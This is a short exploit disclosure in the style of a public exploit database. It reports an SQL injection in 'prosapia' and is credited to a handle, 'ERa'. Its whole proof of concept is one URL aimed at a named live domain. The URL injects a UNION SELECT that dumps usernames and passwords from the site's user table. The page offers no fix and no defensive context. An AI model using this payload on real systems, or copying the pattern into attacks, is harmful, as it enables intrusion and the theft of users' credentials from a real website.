-------------------------------------------------------------*
#Exploit Title: prosapia - SQL Injection vulnerability
#Date: 2020-10-19
#Exploit Author: ERa
#Category:webapps
#Tested On: windows 10, Firefox
Proof of Concept:
Demo :
https://www.prosapia.net/en/job.php?id=-30%20union%20select%201,2,3,4,unhex(hex(group_concat(user_username,0x3a,user_password))),6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20user--
-------------------------------------------------------------*
#Discovered by: ERa
#Email: era_reborn@yahoo.com
-------------------------------------------------------------*